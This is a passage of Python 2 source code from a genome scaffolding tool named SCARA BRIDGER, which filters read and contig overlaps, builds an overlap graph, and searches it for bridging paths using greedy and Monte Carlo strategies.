minOH1 = QOH1 if QOH1 < TOH1 else TOH1 # Smaller left overhang
minOH2 = QOH2 if QOH2 < TOH2 else TOH2 # Smaller right overhang
# Test for too short aligned length
# In this case the overlap is discarded, but both reads are kept
# if test_short_length:
# if float(minQOH + minTOH)/avg_ovl_len > OHmax:
# return -2
# New test for short overlaps
if test_short_length:
if float(minOH1 + minOH2)/avg_ovl_len > OHmax:
return -2
# Test for contained reads
    # Has to come after the test for short aligned length; if the overlap is too short,
    # it's probably a false overlap
if test_contained_reads:
if QOH1 >= TOH1 and QOH2 >= TOH2:
# Target is contained within the query
# Discarding the overlap and target read
tname = pafline['TNAME']
reads_to_discard[tname] = 1
return -1
if TOH1 >= QOH1 and TOH2 >= QOH2:
# Query is contained within the target
# Discarding the overlap and query read
qname = pafline['QNAME']
reads_to_discard[qname] = 1
return -1
# Test for low quality overlap
if test_low_quality:
if SI < SImin:
return -3
# If there are some overlaps with zero extension score on both ends, discard those as well
if QES1 <= 0 and QES2 <= 0 and TES1 <= 0 and TES2 <= 0:
return -4
# If the overlap is correct, write relevant info to the pafline dictionary and return 1
pafline['SI'] = SI
pafline['OS'] = OS
pafline['QES1'] = QES1
pafline['QES2'] = QES2
pafline['TES1'] = TES1
pafline['TES2'] = TES2
return 1
# Check paths for consistency, to see if consecutive edges are really connected by a node
def check_path_consistency(path):
# Empty path is consistent
if len(path) == 0:
return True
prevENode = path[0].endNode
for edge in path[1:]:
sNode = edge.startNode
if sNode != prevENode: # Is current start node equal to the previous end node?
return False
prevENode = edge.endNode # Prepare for the next step
return True
# Checking paths, to see if any contain duplicate reads!
def check_path(path):
used_nodes = {}
if len(path) == 0:
sys.stderr.write('\nERROR: empty path!')
return False
path_snode = path[0].startNode.name
path_enode = path[-1].endNode.name
used_nodes[path[0].startNode.name] = 1
for edge in path:
enode = edge.endNode.name
if enode in used_nodes:
sys.stderr.write('\nERROR: duplicate read %s in path (%s, %s)' % (enode, path_snode, path_enode))
return False
else:
used_nodes[enode] = 1
return True
def load_anchornodes(contigs_file, output=True):
[cheaders, cseqs, cquals] = load_fast(contigs_file, output)
anchornodes = {}
# Adding contigs as anchor nodes
for i in xrange(len(cheaders)):
header = cheaders[i]
idx = header.find(' ') # Removing everything from header, after the first space
if idx > -1:
header = header[:idx]
seq = cseqs[i]
qual = cquals[i]
node = AnchorNode(header, seq, qual)
anchornodes[header] = node
return anchornodes
def load_readnodes(reads_file, output=True):
[rheaders, rseqs, rquals] = load_fast(reads_file, output)
readnodes = {}
# Adding reads as read nodes
for i in xrange(len(rheaders)):
header = rheaders[i]
idx = header.find(' ') # Removing everything from header, after the first space
if idx > -1:
header = header[:idx]
seq = rseqs[i]
qual = rquals[i]
node = ReadNode(header, seq, qual)
readnodes[header] = node
return readnodes
def load_cr_overlaps(cr_overlaps_file, anchornodes, readnodes, reads_to_discard, output=True):
crovledges = [] # Edges representing overlaps between reads and contigs
cr_paf_lines = load_paf(cr_overlaps_file, output)
ncontained = nshort = nlowqual = nusable = nzeroes = 0
for pafline in cr_paf_lines:
qcontig = True # Is PAF query a contig? If false, PAF target is contig
rnode = anode = None
qname = pafline['QNAME']
tname = pafline['TNAME']
if qname in anchornodes:
anode = anchornodes[qname]
elif qname in readnodes:
rnode = readnodes[qname]
else:
sys.stderr.write('\nERROR CROVL: QNAME from PAF (%s) doesn\'t exist in reads or contigs!' % qname)
if tname in anchornodes:
anode = anchornodes[tname]
qcontig = False
elif tname in readnodes:
rnode = readnodes[tname]
else:
sys.stderr.write('\nERROR CROVL: TNAME from PAF (%s) doesn\'t exist in reads or contigs!' % tname)
# retval = test_overlap(pafline, reads_to_discard, test_contained_reads = False)
retval = test_overlap(pafline, reads_to_discard)
if retval == 1:
nusable += 1
startNode = endNode = None
if qcontig:
startNode = anode
endNode = rnode
else:
startNode = rnode
endNode = anode
edge1 = OvlEdge(pafline)
edge2 = OvlEdge(pafline, reverse=True)
edge1.startNode = startNode
edge1.endNode = endNode
startNode.outEdges.append(edge1)
edge2.startNode = endNode
edge2.endNode = startNode
endNode.outEdges.append(edge2)
crovledges.append(edge1)
crovledges.append(edge2)
elif retval == -1:
ncontained += 1
elif retval == -2:
nshort += 1
elif retval == -3:
nlowqual += 1
elif retval == -4:
nzeroes += 1
else:
sys.stderr.write('\nERROR: unknown return value by test_overlap()!')
isolated_anodes = {}
for aname, anode in anchornodes.iteritems():
if len(anode.outEdges) == 0:
isolated_anodes[aname] = anode
# for aname in isolated_anodes:
# del anchornodes[aname]
if output == True:
sys.stdout.write('\nProcessing overlaps between contigs and reads!')
sys.stdout.write('\nNumber of overlaps: %d' % len(cr_paf_lines))
sys.stdout.write('\nUsable: %d' % nusable)
sys.stdout.write('\nContained: %d' % ncontained)
sys.stdout.write('\nShort: %d' % nshort)
sys.stdout.write('\nLow quality: %d' % nlowqual)
sys.stdout.write('\nZero ES: %d' % nzeroes)
sys.stdout.write('\n')
return crovledges, isolated_anodes
# Load read/read overlaps in a single thread
def load_rr_overlaps_ST(rr_overlaps_file, readnodes, reads_to_discard, output=True):
rrovledges = [] # Edges representing overlaps between reads and reads
nselfovl = 0
rr_paf_lines = load_paf(rr_overlaps_file, output)
dummy_reads_to_discard = {} # When checking overlaps between reads, only discarding overlaps
# and not the actual reads
ncontained = nshort = nlowqual = nusable = 0
for pafline in rr_paf_lines:
rnode1 = rnode2 = None
qname = pafline['QNAME']
tname = pafline['TNAME']
if qname in readnodes:
rnode1 = readnodes[qname]
else:
sys.stderr.write('\nERROR RROVL: QNAME from PAF (%s) doesn\'t exist in reads!' % qname)
if tname in readnodes:
rnode2 = readnodes[tname]
else:
sys.stderr.write('\nERROR RROVL: TNAME from PAF (%s) doesn\'t exist in reads!' % tname)
# Discard self-overlaps
if qname == tname:
nselfovl += 1
continue
# retval = test_overlap(pafline, reads_to_discard, test_contained_reads=False, test_short_length=False)
retval = test_overlap(pafline, dummy_reads_to_discard)
if retval == 1:
nusable += 1
edge1 = OvlEdge(pafline)
edge2 = OvlEdge(pafline, reverse=True)
edge1.startNode = rnode1
edge1.endNode = rnode2
rnode1.outEdges.append(edge1)
edge2.startNode = rnode2
edge2.endNode = rnode1
rnode2.outEdges.append(edge2)
rrovledges.append(edge1)
rrovledges.append(edge2)
elif retval == -1:
ncontained += 1
elif retval == -2:
nshort += 1
elif retval == -3:
nlowqual += 1
else:
sys.stderr.write('\nERROR: unknown return value by test_overlap()!')
if output == True:
sys.stdout.write('\nProcessing overlaps between reads and reads!')
sys.stdout.write('\nNumber of overlaps: %d' % len(rr_paf_lines))
sys.stdout.write('\nSelf overlaps: %d' % nselfovl)
sys.stdout.write('\nUsable: %d' % nusable)
sys.stdout.write('\nContained: %d' % ncontained)
sys.stdout.write('\nShort: %d' % nshort)
sys.stdout.write('\nLow quality: %d' % nlowqual)
sys.stdout.write('\n')
return rrovledges
def load_rr_overlaps_part(proc_id, rr_paf_lines_part, readnodes, out_q):
sys.stdout.write('\nSCARA BRIDGER: Starting process %d...\n' % proc_id)
nselfovl = 0
rrovledges_part = []
readnodes_part = {} # A dictionary to collect partial graph
# created by this function
ncontained = nshort = nlowqual = nusable = 0
dummy_reads_to_discard = {} # Currently not used, but a placeholder for maybe using it later
for pafline in rr_paf_lines_part:
rnode1 = rnode2 = None
qname = pafline['QNAME']
tname = pafline['TNAME']
if qname in readnodes:
rnode1 = readnodes[qname]
else:
sys.stderr.write('\nERROR RROVL: QNAME from PAF (%s) doesn\'t exist in reads!' % qname)
if tname in readnodes:
rnode2 = readnodes[tname]
else:
sys.stderr.write('\nERROR RROVL: TNAME from PAF (%s) doesn\'t exist in reads!' % tname)
# Discard self-overlaps
if qname == tname:
nselfovl += 1
continue
# retval = test_overlap(pafline, reads_to_discard, test_contained_reads=False, test_short_length=False)
retval = test_overlap(pafline, dummy_reads_to_discard)
if retval == 1:
nusable += 1
edge1 = OvlEdge(pafline)
edge2 = OvlEdge(pafline, reverse=True)
edge1.startNode = rnode1
edge1.endNode = rnode2
# rnode1.outEdges.append(edge1)
if qname in readnodes_part:
t_edges = readnodes_part[qname]
else:
t_edges = []
t_edges.append(edge1)
readnodes_part[qname] = t_edges
edge2.startNode = rnode2
edge2.endNode = rnode1
# rnode2.outEdges.append(edge2)
if tname in readnodes_part:
t_edges = readnodes_part[tname]
else:
t_edges = []
t_edges.append(edge2)
readnodes_part[tname] = t_edges
rrovledges_part.append(edge1)
rrovledges_part.append(edge2)
elif retval == -1:
ncontained += 1
elif retval == -2:
nshort += 1
elif retval == -3:
nlowqual += 1
else:
sys.stderr.write('\nERROR: unknown return value by test_overlap()!')
out_q.put((rrovledges_part, readnodes_part, ncontained, nshort, nlowqual, nusable, nselfovl))
sys.stdout.write('\nEnding process %d...\n' % proc_id)
pass
# Load read/read overlaps in multiple threads
def load_rr_overlaps_MT(rr_overlaps_file, readnodes, reads_to_discard, numthreads, output=True):
rrovledges = [] # Edges representing overlaps between reads and reads
readnodes_parts = []
rr_paf_lines = load_paf(rr_overlaps_file, output)
dummy_reads_to_discard = {} # When checking overlaps between reads, only discarding overlaps
# and not the actual reads
chunk_size = int(math.ceil(float(len(rr_paf_lines))/numthreads))
rr_paf_lines_split = [rr_paf_lines[i:i+chunk_size] for i in xrange(0, len(rr_paf_lines), chunk_size)]
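# Note: with e.g. 10 PAF lines and 3 threads, chunk_size is 4 and the lines are split into chunks of 4, 4 and 2 (the last chunk may be smaller)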
# Spawning and calling processes
out_q = multiprocessing.Queue()
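# Each worker process puts its partial results (edge list, per-read edge dictionary and counters) on this queue, to be merged below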
jobs = []
proc_id = 0
for rr_paf_lines_part in rr_paf_lines_split:
proc_id += 1
partname = 'THREAD%d' % proc_id
proc = multiprocessing.Process(name=partname, target=load_rr_overlaps_part, args=(proc_id, rr_paf_lines_part, readnodes, out_q,))
jobs.append(proc)
proc.start()
# Summarizing results from different processes
ncontained = nshort = nlowqual = nusable = nselfovl = 0
for i in xrange(len(jobs)):
(rrovledges_part, readnodes_part, t_ncontained, t_nshort, t_nlowqual, t_nusable, t_nselfovl) = out_q.get()
rrovledges += rrovledges_part
ncontained += t_ncontained
nshort += t_nshort
nlowqual += t_nlowqual
nusable += t_nusable
nselfovl += t_nselfovl
readnodes_parts.append(readnodes_part)
if output:
sys.stdout.write('\nSCARA BRIDGER: All processes finished!')
# Wait for all processes to end
for proc in jobs:
proc.join()
# Summarizing edges for each node
for readnodes_part in readnodes_parts:
for rname, t_outedges in readnodes_part.iteritems():
rnode = readnodes[rname]
rnode.outEdges += t_outedges
# KK: Old, single process, code is commented here
# ncontained = nshort = nlowqual = nusable = 0
# for pafline in rr_paf_lines:
# rnode1 = rnode2 = None
# qname = pafline['QNAME']
# tname = pafline['TNAME']
# if qname in readnodes:
# rnode1 = readnodes[qname]
# else:
# sys.stderr.write('\nERROR RROVL: QNAME from PAF (%s) doesn\'t exist in reads!' % qname)
# if tname in readnodes:
# rnode2 = readnodes[tname]
# else:
# sys.stderr.write('\nERROR RROVL: TNAME from PAF (%s) doesn\'t exist in reads!' % tname)
# # retval = test_overlap(pafline, reads_to_discard, test_contained_reads=False, test_short_length=False)
# retval = test_overlap(pafline, dummy_reads_to_discard)
# if retval == 1:
# nusable += 1
# edge1 = OvlEdge(pafline)
# edge2 = OvlEdge(pafline, reverse=True)
# edge1.startNode = rnode1
# edge1.endNode = rnode2
# rnode1.outEdges.append(edge1)
# edge2.startNode = rnode2
# edge2.endNode = rnode1
# rnode2.outEdges.append(edge2)
# rrovledges.append(edge1)
# rrovledges.append(edge2)
# elif retval == -1:
# ncontained += 1
# elif retval == -2:
# nshort += 1
# elif retval == -3:
# nlowqual += 1
# else:
# sys.stderr.write('\nERROR: unknown return value by test_overlap()!')
if output == True:
sys.stdout.write('\nProcessing overlaps between reads and reads!')
sys.stdout.write('\nNumber of overlaps: %d' % len(rr_paf_lines))
sys.stdout.write('\nSelf overlaps: %d' % nselfovl)
sys.stdout.write('\nUsable: %d' % nusable)
sys.stdout.write('\nContained: %d' % ncontained)
sys.stdout.write('\nShort: %d' % nshort)
sys.stdout.write('\nLow quality: %d' % nlowqual)
sys.stdout.write('\n')
return rrovledges
# 1st Approach
# For every anchor node consider all connecting read nodes
# For further extension consider only the read with the highest OVERLAP score
def getPaths_maxovl(anchornodes, readnodes, crovledges, rrovledges, output=True):
paths = [] # A list of paths
# Each path is a list of its own, containing edges that are traversed
reads_traversed = {} # A dictionary of reads that have already been traversed
# Each read can only be used once
N = 20 # Number of nodes placed on stack in each step of graph traversal
if output:
sys.stdout.write('\nSCARA BRIDGER: Starting collecting paths using maximum overlap score!')
for (aname, anode) in anchornodes.iteritems():
for edge in anode.outEdges:
path = [] # Initializing a path
stack = [] # and a stack for graph traversal
# A stack will contain a list of edges to be processed
# For each read determine the direction of extension (LEFT or RIGHT)
# Needs to be preserved throughout the path, taking into account relative strands
direction = directionLEFT
if edge.ESright > edge.ESleft:
direction = directionRIGHT
# KK: Control
if edge.ESright <= 0 and edge.ESleft <= 0:
continue
stack.append(edge) # For each inital node, place only its edge on the stack
# In each step of graph traversal:
# - Pop the last node
# - Check if it can connect to an anchor node
# - If it can, the path is complete
# - If not, get a number of connected read nodes with the greatest OS and place them on the stack
# - If no reads are available, adjust the path and continue
while stack:
redge = stack.pop() # Pop an edge from the stack
rnode = redge.endNode # And the corresponding node
direction2 = directionLEFT
if redge.ESright > redge.ESleft:
direction2 = directionRIGHT
# Check if the node from the stack can continue the current path
if (len(path) > 0) and ((path[-1].endNode != redge.startNode) or (direction != direction2)):
# If not, put the edge back on the stack
stack.append(redge)
# And remove the last edge from the path
# If the removed edge represents an overlap of reads from different strands
# reverse the direction of extension
popedge = path.pop()
if popedge.Strand == '-':
direction = reverseDirection(direction)
# Skip to next iteration
continue
# If the path is too long, skip this iteration and let
# the above code eventually reduce the path
if len(path) >= HardNodeLimit:
continue
path.append(redge) # Add edge to the path
if redge.Strand == '-': # If edge represents an overlap of reads from different strands
direction = reverseDirection(direction) # then reverse the direction of extension
reads_traversed[rnode.name] = 1 # And mark the node as traversed
Aedges = [] # Edges to anchor nodes
Redges = [] # Edges to read nodes
for edge2 in rnode.outEdges:
# KK: Control
if edge2.ESright <= 0 and edge2.ESleft <= 0:
continue
endNode = edge2.endNode
if endNode.name in reads_traversed: # Each read can only be used once
continue
direction2 = directionLEFT
if edge2.ESright > edge2.ESleft:
direction2 = directionRIGHT
if direction2 != direction: # Direction of extension must be maintained
continue
if endNode.nodetype == Node.ANCHOR:
if endNode.name != aname: # We only want nodes that are different from the starting node!
Aedges.append(edge2) # NOTE: this might change, as we might want to scaffold circular genomes!
elif endNode.nodetype == Node.READ:
Redges.append(edge2)
else:
sys.stderr.write("SCARA BRIDGER: ERROR - invalid node type: %d" % endNode.nodetype)
if Aedges: # If anchor nodes have been reached find the best one
Aedges.sort(key=lambda edge: edge.OS, reverse=True) # by sorting them according to OS and taking the first one
Aedge = Aedges[0] # Create a path and end this instance of tree traversal
path.append(Aedge)
paths.append(path)
break
elif Redges: # If no anchor nodes have been found we have to continue with read nodes
Redges.sort(key=lambda edge: edge.OS, reverse=True) # Sort them and take top N to put on the stack
# Redge = Redges[0]
# stack.append(Redge.endNode)
stack += [redge for redge in reversed(Redges[0:N])] # Place N best edges on the stack in reverse order, so that the best one ends on top
# KK: this is done at a different place in the code
# path.append(Redge)
# reads_traversed[Redge.endNode.name] = 1
else: # Graph traversal has come to a dead end
try:
edge2 = path.pop() # Remove the last edge from the path
# If the removed edge represents an overlap of reads from different strands
# reverse the direction of extension
if edge2.Strand == '-':
direction = reverseDirection(direction)
del reads_traversed[rnode.name] # Remove current read node from the list of traversed ones
except:
import pdb
pdb.set_trace()
pass
if output:
sys.stdout.write('\nSCARA BRIDGER: Finishing collecting paths using maximum overlap score!')
return paths
# 2nd Approach
# For every anchor node consider all connecting read nodes
# For further extension consider only the read with the highest EXTENSION score
def getPaths_maxext(anchornodes, readnodes, crovledges, rrovledges, output=True):
paths = [] # A list of paths
# Each path is a list of its own, containing edges that are traversed
reads_traversed = {} # A dictionary of reads that have already been traversed
# Each read can only be used once
N = 20 # Number of nodes placed on stack in each step of graph traversal
if output:
sys.stdout.write('\nSCARA BRIDGER: Starting collecting paths using maximum extension score!')
for (aname, anode) in anchornodes.iteritems():
for edge in anode.outEdges:
path = [] # Initializing a path
stack = [] # and a stack for graph traversal
# A stack will contain a list of edges to be processed
# For each read determine the direction of extension (LEFT or RIGHT)
# Needs to be preserved throughout the path
direction = directionLEFT
if edge.ESright > edge.ESleft:
direction = directionRIGHT
stack.append(edge) # For each inital node, place only its edge on the stack
# In each step of graph traversal:
# - Pop the last node
# - Check if it can connect to an anchor node
# - If it can, the path is complete
# - If not, get a number of connected read nodes with the greatest ES and place them on the stack
# - If no reads are available, adjust the path and continue
while stack:
redge = stack.pop() # Pop an edge from the stack
rnode = redge.endNode # And the corresponding node
direction2 = directionLEFT
if redge.ESright > redge.ESleft:
direction2 = directionRIGHT
# Check if the node from the stack can continue the current path
if (len(path) > 0) and ((path[-1].endNode != redge.startNode) or (direction != direction2)):
# If not, put the edge back on the stack
stack.append(redge)
# And remove the last edge from the path
# If the removed edge represents an overlap of reads from different strands
# reverse the direction of extension
popedge = path.pop()
if popedge.Strand == '-':
direction = reverseDirection(direction)
# Skip to next iteration
continue
# If the path is too long, skip this iteration and let
# the above code eventually reduce the path
if len(path) >= HardNodeLimit:
continue
path.append(redge) # Add edge to the path
reads_traversed[rnode.name] = 1 # And mark the node as traversed
if redge.Strand == '-': # If edge represents an overlap of reads from different strands
direction = reverseDirection(direction) # then reverse the direction of extension
Aedges = [] # Edges to anchor nodes
Redges = [] # Edges to read nodes
for edge2 in rnode.outEdges:
endNode = edge2.endNode
if endNode.name in reads_traversed: # Each read can only be used once
continue
direction2 = directionLEFT
if edge2.ESright > edge2.ESleft:
direction2 = directionRIGHT
if direction2 != direction: # Direction of extension must be maintained
continue
if endNode.nodetype == Node.ANCHOR:
if endNode.name != aname: # We only want nodes that are different from the starting node!
Aedges.append(edge2) # NOTE: this might change, as we might want to scaffold circular genomes!
elif endNode.nodetype == Node.READ:
Redges.append(edge2)
if Aedges: # If anchor nodes have been reached find the best one
if direction == directionLEFT: # by sorting them according to ES and taking the first one
Aedges.sort(key=lambda edge: edge.ESleft, reverse=True)
else:
Aedges.sort(key=lambda edge: edge.ESright, reverse=True)
Aedge = Aedges[0] # Create a path and end this instance of tree traversal
path.append(Aedge)
paths.append(path)
break
elif Redges: # If no anchor nodes have been found we have to continue with read nodes
if direction == directionLEFT: # Sort them and take top N to put on the stack (currently testing with N=1)
Redges.sort(key=lambda edge: edge.ESleft, reverse=True)
stack += [redge for redge in reversed(Redges[0:N]) if redge.ESleft > 0]
else:
Redges.sort(key=lambda edge: edge.ESright, reverse=True)
stack += [redge for redge in reversed(Redges[0:N]) if redge.ESright > 0]
# stack += [redge for redge in reversed(Redges[0:N])] # Place N best edges on the stack in reverse order, so that the best one ends on top
else: # Graph traversal has come to a dead end
try:
edge2 = path.pop() # Remove the last edge from the path
del reads_traversed[rnode.name] # Remove current read node from the list of traversed ones
# If the removed edge represents an overlap of reads from different strands
# reverse the direction of extension
if edge2.Strand == '-':
direction = reverseDirection(direction)
except:
import pdb
pdb.set_trace()
pass
if output:
sys.stdout.write('\nSCARA BRIDGER: Finishing collecting paths using maximum extension score!')
return paths
# 3rd Approach
# Monte Carlo method - randomly select reads for each extension
# probability of selecting a read is proportional to extension score
def getPaths_MC(anchornodes, readnodes, crovledges, rrovledges, numpaths, output=True):
paths = [] # A list of paths
# Each path is a list of its own, containing edges that are traversed
reads_traversed = {} # A dictionary of reads that have already been traversed
# Each read can only be used once
# NOTE: should this be used with Monte Carlo!
N = 10
max_iterations = 10000
iteration = 0
igoal = 1000
random.seed()
if output:
sys.stdout.write('\nSCARA BRIDGER: Starting collecting paths using Monte Carlo method!')
sys.stdout.write('\nITERATIONS:')
anames = anchornodes.keys()
while len(paths) < numpaths and iteration < max_iterations:
iteration += 1
if output and iteration > igoal:
sys.stdout.write(' %d' % igoal)
igoal += 1000
# Randomly choose an anchor node
aname = random.choice(anames)
anode = anchornodes[aname]
totalES_A = 0.0
problist_A = [] # Used to randomly select an edge to use
problist_A.append(totalES_A)
if len(anode.outEdges) == 0: # Skip nodes that have no edges (NOTE: this can probably be removed since such nodes have been discarded)
continue
for edge in anode.outEdges: # Calculate total Extension score, for random selection
maxES = edge.ESleft if edge.ESleft > edge.ESright else edge.ESright
totalES_A += maxES
problist_A.append(totalES_A)
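# problist_A now holds cumulative extension scores; a uniform draw in [0, totalES_A) below selects an edge with probability proportional to its maximum ES (roulette-wheel selection)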
rand = random.random()*totalES_A
k=1
try:
while problist_A[k] < rand:
k += 1
except:
import pdb
pdb.set_trace()
pass
edge = anode.outEdges[k-1]
# KK: control
if edge.ESleft <= 0 and edge.ESright <= 0:
continue
path = [] # Initializing a path
stack = [] # and a stack for graph traversal
# A stack will contain a list of edges to be processed
# For each read determine the direction of extension (LEFT or RIGHT)
# Needs to be preserved throughout the path
direction = directionLEFT
if edge.ESright > edge.ESleft:
direction = directionRIGHT
stack.append(edge) # For each inital node, place only its edge on the stack
# In each step of graph traversal:
# - Pop the last node
# - Check if it can connect to an anchor node
# - If it can, the path is complete
# - If not, randomly generate a number of connected read nodes with the probability of generation
# proportional to ES and place them on the stack
# - If no reads are available, adjust the path and continue
while stack:
redge = stack.pop() # Pop an edge from the stack
rnode = redge.endNode # And the corresponding node
direction2 = directionLEFT
if redge.ESright > redge.ESleft:
direction2 = directionRIGHT
# Check if the node from the stack can continue the current path
if (len(path) > 0) and ((path[-1].endNode != redge.startNode) or (direction != direction2)):
# If not, put the edge back on the stack
stack.append(redge)
# And remove the last edge from the path
# If the removed edge represents an overlap of reads from different strands
# reverse the direction of extension
popedge = path.pop()
if popedge.Strand == '-':
direction = reverseDirection(direction)
# Skip to next iteration
continue
# If the path is too long, skip this iteration and let
# the above code eventually reduce the path
if len(path) >= HardNodeLimit:
continue
path.append(redge) # Add edge to the path
reads_traversed[rnode.name] = 1 # And mark the node as traversed
if redge.Strand == '-': # If edge represents an overlap of reads from different strands
direction = reverseDirection(direction) # then reverse the direction of extension
Aedges = [] # Edges to anchor nodes
Redges = [] # Edges to read nodes
for edge2 in rnode.outEdges:
# KK: control
if edge2.ESleft <= 0 and edge2.ESright <= 0:
continue
endNode = edge2.endNode
if endNode.name in reads_traversed: # Each read can only be used once
continue
direction2 = directionLEFT
if edge2.ESright > edge2.ESleft:
direction2 = directionRIGHT
if direction2 != direction: # Direction of extension must be maintained
continue
if endNode.nodetype == Node.ANCHOR:
if endNode.name != aname: # We only want nodes that are different from the starting node!
Aedges.append(edge2) # NOTE: this might change, as we might want to scaffold circular genomes!
elif endNode.nodetype == Node.READ:
# Put in only edges that extend in the appropriate direction
if (direction == directionLEFT and edge2.ESleft > edge2.ESright) or \
(direction == directionRIGHT and edge2.ESright > edge2.ESleft):
Redges.append(edge2)
if Aedges: # If anchor nodes have been reached find the best one
if direction == directionLEFT: # by sorting them according to ES and taking the first one
Aedges.sort(key=lambda edge: edge.ESleft, reverse=True)
else:
Aedges.sort(key=lambda edge: edge.ESright, reverse=True)
Aedge = Aedges[0] # Create a path and end this instance of tree traversal
path.append(Aedge)
paths.append(path)
break
elif Redges: # If no anchor nodes have been found we have to continue with read nodes
totalES = 0.0 # Randomly select N to put on the stack
problist = []
problist.append(totalES)
if direction == directionLEFT: # Extending to left
for redge in Redges:
totalES += redge.ESleft
problist.append(totalES)
else: # Extending to RIGHT
for redge in Redges:
totalES += redge.ESright
problist.append(totalES)
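# problist holds cumulative extension scores for the candidate read edges; each of the N draws below selects an edge with probability proportional to its ES in the current direction (roulette-wheel selection)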
try:
for j in range(N): # Randomly generating N nodes to place on stack
rand = random.random()*totalES # NOTE: currently it's possible for the same node to be placed more than once
k = 1
while problist[k] < rand:
k += 1
stack.append(Redges[k-1])
except:
import pdb
pdb.set_trace()
pass
else: # Graph traversal has come to a dead end
try:
edge2 = path.pop() # Remove the last edge from the path
del reads_traversed[rnode.name] # Remove current read node from the list of traversed ones
# If the removed edge represents an overlap of reads from different strands
# reverse the direction of extension
if edge2.Strand == '-':
direction = reverseDirection(direction)
except:
import pdb
pdb.set_trace()
pass
if output:
sys.stdout.write('\nSCARA BRIDGER: Finishing collecting paths using Monte Carlo method!')
if iteration >= max_iterations:
sys.stdout.write('\nSCARA BRIDGER: Finished by running out of iterations!')
return paths
# 3rd Approach
# Monte Carlo method - randomly select reads for each extension
# probability of selecting a read is proportional to extension score
def getPaths_MC_OLD(anchornodes, readnodes, crovledges, rrovledges, numpaths, output=True):
paths = [] # A list of paths
# Each path is a list of its own, containing edges that are traversed
reads_traversed = {} # A dictionary of reads that have already been traversed
# Each read can only be used once
# NOTE: should this be used with Monte Carlo!
N = 10
pathspernode = int(math.ceil(float(numpaths)/len(anchornodes)) + 1) # The number of paths generated for each anchor node
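# e.g. numpaths=100 with 40 anchor nodes gives ceil(2.5) + 1 = 4 paths per anchor node (illustrative numbers)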
random.seed()
if output:
sys.stdout.write('\nSCARA BRIDGER: Starting collecting paths using Monte Carlo method!')
for (aname, anode) in anchornodes.iteritems():
totalES_A = 0.0
problist_A = [] # Used to randomly select an edge to use
problist_A.append(totalES_A)
if len(anode.outEdges) == 0: # Skip nodes that have no edges
continue
for edge in anode.outEdges: # Calculate total Extension score, for random selection
maxES = edge.ESleft if edge.ESleft > edge.ESright else edge.ESright
totalES_A += maxES
problist_A.append(totalES_A)
for i in xrange(pathspernode): # For each anchor node generate "pathspernode" paths
rand = random.random()*totalES_A
k=1
try:
while problist_A[k] < rand:
k += 1
except:
import pdb
pdb.set_trace()
pass
edge = anode.outEdges[k-1]
path = [] # Initializing a path
stack = [] # and a stack for graph traversal
# A stack will contain a list of edges to be processed
# For each read determine the direction of extension (LEFT or RIGHT)
# Needs to be preserved throughout the path
direction = directionLEFT
if edge.ESright > edge.ESleft:
direction = directionRIGHT
stack.append(edge) # For each inital node, place only its edge on the stack
# In each step of graph traversal:
# - Pop the last node
# - Check if it can connect to an anchor node
# - If it can, the path is complete
# - If not, randomly generate a number of connected read nodes with the probability of generation
# proportional to ES and place them on the stack
# - If no reads are available, adjust the path and continue
while stack:
redge = stack.pop() # Pop an edge from the stack
rnode = redge.endNode # And the corresponding node
path.append(redge) # Add edge to the path
reads_traversed[rnode.name] = 1 # And mark the node as traversed
Aedges = [] # Edges to anchor nodes
Redges = [] # Edges to read nodes
for edge2 in rnode.outEdges:
endNode = edge2.endNode
if endNode.name in reads_traversed: # Each read can only be used once
continue
direction2 = directionLEFT
if edge2.ESright > edge2.ESleft:
direction2 = directionRIGHT
if direction2 != direction: # Direction of extension must be maintained
continue
if endNode.nodetype == Node.ANCHOR:
if endNode.name != aname: # We only want nodes that are different from the starting node!
Aedges.append(edge2) # NOTE: this might change, as we might want to scaffold circular genomes!
elif endNode.nodetype == Node.READ:
Redges.append(edge2)
if Aedges: # If anchor nodes have been reached find the best one
if direction == directionLEFT: # by sorting them according to ES and taking the first one
Aedges.sort(key=lambda edge: edge.ESleft, reverse=True)
else:
Aedges.sort(key=lambda edge: edge.ESright, reverse=True)
Aedge = Aedges[0] # Create a path and end this instance of tree traversal
path.append(Aedge)
paths.append(path)
break
elif Redges: # If no anchor nodes have been found we have to continue with read nodes
totalES = 0.0 # Randomly select N to put on the stack
problist = []
problist.append(totalES)
if direction == directionLEFT: # Extending to left
for redge in Redges:
totalES += redge.ESleft
problist.append(totalES)
else: # Extending to RIGHT
for redge in Redges:
totalES += redge.ESright
problist.append(totalES)
try:
for j in range(N): # Randomly generating N nodes to place on stack
rand = random.random()*totalES # NOTE: currently it's possible for the same node to be placed more than once
k = 1
while problist[k] < rand:
k += 1
stack.append(Redges[k-1])
except:
import pdb
pdb.set_trace()
pass
else: # Graph traversal has come to a dead end
try:
edge2 = path.pop() # Remove the last edge from the path
del reads_traversed[rnode.name] # Remove current read node from the list of traversed ones
except:
import pdb
pdb.set_trace()
pass
if output:
sys.stdout.write('\nSCARA BRIDGER: Finishing collecting paths using Monte Carlo method!')
return paths
# Remove readnode from the graph
# - Remove from all anchornodes' outgoing edges
# - Remove from all readnodes' outgoing edges
# - remove from readnodes
# - Remove from crovl edges
# - remove from rrovl edges
def remove_readnode(rname, anchornodes, readnodes, crovledges, rrovledges):
if rname not in readnodes:
sys.stderr.write('\nERROR: trying to remove a nonexistent read node: %s!' % rname)
# Fetching the readnode to delete
rnode = readnodes[rname]
numRemovedEdges = 0
# Removing from crovledges
# Not sure if I can remove from the list I am iterating on so doing this instead
edgesToRemove = []
for edge in crovledges:
if edge.startNode == rnode or edge.endNode == rnode:
edgesToRemove.append(edge)
# Removing selected edges
for edgeTR in edgesToRemove:
crovledges.remove(edgeTR)
numRemovedEdges += 1
# Removing from rrovledges
edgesToRemove = []
for edge in rrovledges:
if edge.startNode == rnode or edge.endNode == rnode:
edgesToRemove.append(edge)
# Removing selected edges
for edgeTR in edgesToRemove:
rrovledges.remove(edgeTR)
numRemovedEdges += 1
# Removing node from readnodes
del readnodes[rname]
# Removing outgoing edges from readnodes
for rnode2 in readnodes.itervalues():
edgesTR = []
for edge in rnode2.outEdges:
if edge.startNode == rnode or edge.endNode == rnode:
edgesTR.append(edge)
for edge in edgesTR:
rnode2.outEdges.remove(edge)
# Removing outgoing edges from anchornodes
for anode in anchornodes.itervalues():
edgesTR = []
for edge in anode.outEdges:
if edge.startNode == rnode or edge.endNode == rnode:
edgesTR.append(edge)
for edge in edgesTR:
anode.outEdges.remove(edge)
return numRemovedEdges
### Cleaning up the graph
# - Read nodes can connect only to a single anchor node, with maximum overlap score
# - removing overlaps for discarded reads
# - TODO: Anything else I can think of
